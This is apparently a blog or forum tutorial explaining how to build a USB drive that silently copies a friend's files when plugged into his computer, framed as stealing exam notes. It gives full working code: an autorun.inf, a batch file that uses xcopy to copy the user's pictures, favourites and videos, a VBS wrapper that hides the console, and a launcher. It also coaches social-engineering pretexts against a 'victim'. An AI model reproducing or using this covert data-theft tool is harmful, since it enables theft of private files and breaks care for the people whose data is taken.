Steel Someone Secret File Using USB Flash Drive.
Let’s say you and your friend are preparing for an all important exam that is going to decide the course the rest of your life takes. Your friend has some important notes on his computer that he isn’t going to share with you. Your friend is a moron. You need the notes so badly that you are willing to steal from him. He deserves it anyway.
To get the notes you can either break into his house at night, an accomplice keeps you hanging by a rope from the roof while you deliberately copy the files to your flash drive taking care not to let your feet touch the floor. Or you can walk into his room one morning and say with a feigned smile, “Hey, buddy! I have some great new music. Want it?”. Then plug your USB Flash drive into his PC to automatically copy his notes to your pen drive, secretly and silently. Copy the songs you brought to his PC to complete the act.
Sneaky, isn’t it? So let us prepare such a sinister USB Flash drive.
STEP 1
Open Notepad (I recommend Notepad++) and copy-paste the following
lines.
(Code-
[autorun]
icon=drive.ico
open=launch.bat
action=Click OK to Run
shell\open\command=launch.bat)
Save this as autorun.inf
The icon line is optional. You can change the icon to your tastes or leave it to the default icon. It’s useful for social engineering purposes like enticing the user to click a file on the drive by making it looks like a game or something.
The “action=” command is optional too but sometimes when the autorun launches it may ask the user what to open. Depending on what you put here the user will be instructed to click Ok or run the file. This code acts as a backup just in case the user is asked what to open. This is not required if you are operating the computer.
The “shell/open command” also acts as a backup in case the user clicks cancel instead of open when prompted. This code will execute when the drive letter is clicked on.
STEP 2
Open Notepad again and copy-paste the following lines
(code-
@echo off
:: variables
/min
SET odrive=%odrive:~0,2%
set backupcmd=xcopy /s /c /d /e /h /i /r /y
echo off
%backupcmd% “%USERPROFILE%\pictures” “%drive%\all\My pics”
%backupcmd% “%USERPROFILE%\Favorites” “%drive%\all\Favorites”
%backupcmd% “%USERPROFILE%\videos” “%drive%\all\vids”
@echo off
cls)
Save this as file.bat
This file is configured to copy the contents of the current users pictures, favorites, and videos folder to the Flash drive under a folder called “all”. This is the section of the code you will need to edit depending on what you want to copy.
The first file path “%USERPROFILE%\pictures” – is the target.
The second file path “%drive%\all\My pics” – is the destination.
STEP 3
Open Notepad once again and copy-paste the following line.
(code:
CreateObject(“Wscript.Shell”).Run “””” & WScript.Arguments(0) & “”””, 0, False)
Save this as invisible.vbs
This code runs the file.bat as a process so it does not show the CMD prompt and everything the
batch file is processing.
STEP 4
Open Notepad one last time and copy-paste the following line.
(code
wscript.exe \invisible.vbs file.bat)
Save this as launch.bat
This batch file does two things, it looks for the invisible.vbs file in the root of the Flash drive then loads it with file.batso file.bat is run with
code from vbs file.
STEP 5
Copy all 4 files created in the above steps and put it on the root of the Flash drive, including the icon file if needed. Also create a folder named “all” where the contents are to be copied automatically. You can call this folder by any name, but then you need to reflect the changes you made in step 2.
This is all that needs to be done. Test the Flash drive on your own computer first before playing it out on your victim. It works flawlessly